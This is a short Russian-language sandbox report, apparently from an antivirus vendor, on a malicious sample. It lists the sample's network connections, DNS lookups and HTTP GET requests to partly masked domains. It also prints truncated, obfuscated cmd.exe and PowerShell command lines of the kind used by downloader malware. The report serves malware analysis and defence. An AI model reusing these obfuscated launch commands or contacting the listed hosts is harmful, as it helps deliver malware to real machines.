Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' ndjkhfdshfjksdfjkds fhdjsk fhsdjkfsdkjfska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %OSHXjiXpQcCq%=p^o^w^er&&set %EIYSkVdMjIPwO%=^sh^el^l&...
Сетевая активность
Подключается к
- '38##l.ru':80
- '38##l.ru':443
- '4x###rokko.nl':80
TCP
Запросы HTTP GET
- http://38##l.ru/37wTrAY/
- http://www.4x###rokko.nl/Dnx2k0T/
- http://www.4x###rokko.nl/Dnx2k0T
Другие
- '38##l.ru':443
UDP
- DNS ASK vi#####iadiamante.com
- DNS ASK 38##l.ru
- DNS ASK tr####imperial.ru
- DNS ASK 4x###rokko.nl
- DNS ASK ud#3.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' ndjkhfdshfjksdfjkds fhdjsk fhsdjkfsdkjfska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %OSHXjiXpQcCq%=p^o^w^er&&set %EIYSkVdMjIPwO%=^sh^el^l&...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "(' (xkf(xkf+xkfs1D(xkf+xkf'+'s1D+s1D(yDSgc'+'BnsyDS+yDSxkf+xkfadayxkf+xkfDS+yDSsxkf+xkfd = &(csqncsq+csqecyDS+yDSsq+csqw-yDS+yDSoyDSs1D+s1D+yDSxk'+'f+xkfbyDS+yDSjeyDS+yDSccsq+csqyDS+'+'xkf+xkf...
